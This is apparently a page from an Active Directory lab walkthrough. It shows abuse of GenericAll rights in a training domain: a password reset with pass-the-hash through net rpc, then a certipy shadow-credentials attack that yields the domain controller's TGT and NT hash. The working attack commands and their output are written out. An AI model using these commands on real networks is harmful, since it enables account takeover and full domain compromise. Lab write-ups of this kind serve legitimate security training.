Generic all on user (CentralPark -> diego.Montenegro)

  • Now Nicolas.Maduro is in CentralPark so we can take the control of diego.Montenegro with the genericAll on diego.Montenegro

  • let’s change diego.Montenegro password with ldeep

net rpc password diego.Montenegro --pw-nt-hash -U NewYork.local/Nicolas.Maduro%b3b3717f7d51b37fb325f7e7d048e998 -S NYC.Newyork.local

  • We will set the password letsdothis

GenericAll on Computer (diego.Montenegro-> NYC)

  • Now we own diego.Montenegro, let’s finish the domain with the generic Write on the DC

  • We already done that on the previous chapter.

  • But what if you can’t add a computer in the domain (more and more customers disable the ability for a simple user to add computer to the domains and this is a good practice from a security point of view), you can do a shadow credentials attack on the computer.

  • So if ADCS is enabled on the domain, and we got write privilege on msDS-KeyCredentialLink, we can do the shadow credentials attack to get a direct access on the target account.

  • Shadow credentials is now include with certipy (this attack can also be done with pywisker )

certipy shadow auto -u diego.Montenegro@NewYork.local -p 'letsdothis' -account 'NYC$'

Certipy v4.3.0 - by Oliver Lyak (ly4k)

[*] Targeting user 'NYC$'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '86b8f1a3-21b0-1a7f-bba2-b683a92326ae'
[*] Adding Key Credential with device ID '86b8f1a3-21b0-1a7f-bba2-b683a92326ae' to the Key Credentials for 'NYC$'
[*] Successfully added Key Credential with device ID '86b8f1a3-21b0-1a7f-bba2-b683a92326ae' to the Key Credentials for 'NYC$'
[*] Authenticating as 'NYC$' with the certificate
[*] Using principal: nyc$@newyork.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'nyc.ccache'
[*] Trying to retrieve NT hash for 'nyc$'
[*] Restoring the old Key Credentials for 'NYC$'
[*] Successfully restored the old Key Credentials for 'NYC$'
[*] NT hash for 'NYC$': 4434b2874a45816ce75c971df2187ca6

  • Now we got the tgt and the NT hash of NYC$

  • Obviously we can do a dcsync because NYC is a DC, but instead let’s try to directly get a shell

  • To do that the easiest way is using s4u2self abuse or create a silver ticket

PreviousWriteOwner on Group (EmpireState -> CentralPark)Nextmachine account to administrator shell

Last updated